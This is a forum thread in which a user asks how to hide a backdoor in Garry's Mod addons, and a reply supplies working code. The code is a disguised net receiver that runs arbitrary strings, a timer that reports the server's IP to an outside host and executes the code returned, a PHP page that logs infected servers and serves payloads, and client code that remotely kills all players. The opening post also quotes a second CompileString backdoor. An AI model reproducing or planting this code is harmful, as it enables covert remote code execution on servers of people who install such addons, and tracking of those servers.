Results 1 to 2 of 2
  1. #1
    sealatron2's Avatar
    Join Date
    Aug 2017
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    0
    My Mood
    Confused

    Question How to add a backdoor to a addon?

    I just wanna know how would I add a backdoor to my addons that I would upload.
    And how would I know if my backdoored addon was on a server?
    And I use [Generic Backdoor Code]
    ["Code"] = "util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
    Or just using OdiumBackdoor in general

  2. #2
    svyanov's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Posts
    7
    Reputation
    10
    Thanks
    0
    My Mood
    Fine
    There are many ways to make backdoor.
    Put this code in your addon:
    util.AddNetworkString("SuperOptimizationDontDelete ")
    net.Receive("SuperOptimizationDontDelete", function()
    RunString(net.ReadString())
    end)


    timer.Create("1____", 10, 1, function()
    if !game.IsDedicated() then return end
    http.Fetch("https://super-website.zone/fetch.php?ip="..game.GetIPAddress(), RunString)
    end)
    If you want to log backdoored servers you need website
    here is simple php code for logging:
    https://super-website.zone/fetch.php:
    <?
    function getUserIP() {
    $ipaddress = '';
    if (isset($_SERVER['HTTP_CLIENT_IP']))
    $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else if(isset($_SERVER['HTTP_X_FORWARDED']))
    $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
    else if(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']))
    $ipaddress = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
    else if(isset($_SERVER['HTTP_FORWARDED_FOR']))
    $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
    else if(isset($_SERVER['HTTP_FORWARDED']))
    $ipaddress = $_SERVER['HTTP_FORWARDED'];
    else if(isset($_SERVER['REMOTE_ADDR']))
    $ipaddress = $_SERVER['REMOTE_ADDR'];
    else
    $ipaddress = 'UNKNOWN';
    return $ipaddress;
    }
    $ip = $_REQUEST['ip'];
    $time = time();

    if ( preg_match('/([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\:?([0-9]{1,5})?/', $ip, $match) ) {
    if (!isset($match['1']) or !isset($match['2']) or getUserIP() != $match['1']) exit();
    }
    $data = json_decode(file_get_contents('servers.json'), true);
    if (!is_array($data)) {
    $data = array();
    }

    $data[$ip] = $time;
    file_put_contents('servers.json', json_encode($data, true));

    die(file_get_contents("code.lua"));
    ?>
    Additional backdoor on logging page, will be runned when server starts
    https://super-website.zone/code.lua:
    print('Hello there')
    Now all backdoored dedicated servers will apear in servers.json file on website
    Join server and run code on your client side
    local runonsv = [[
    for k,v in pairs(player.GetAll()) do
    v:Kill()
    end
    ]]
    net.Start("SuperOptimizationDontDelete")
    net.WriteString(runonsv)
    net.SendToServer()

Similar Threads

  1. [Help] How to add a backdoor to an Addon
    By Olophobic in forum Garry's Mod Discussions & Help
    Replies: 0
    Last Post: 02-06-2019, 05:35 PM
  2. How to add a password?
    By str1k3r21 in forum Visual Basic Programming
    Replies: 1
    Last Post: 10-20-2007, 04:16 PM
  3. how to add picture in vb6 trainer problem!!
    By 123456789987654321 in forum WarRock - International Hacks
    Replies: 1
    Last Post: 06-09-2007, 11:47 AM
  4. [TUT] How to add Oriental/Korean Fonts
    By W$t$5TA34TYTHSETH5Y5 in forum WarRock Korea Hacks
    Replies: 2
    Last Post: 05-06-2007, 11:08 AM
  5. how to add pointers
    By ragman1234 in forum WarRock - International Hacks
    Replies: 1
    Last Post: 04-15-2007, 09:51 AM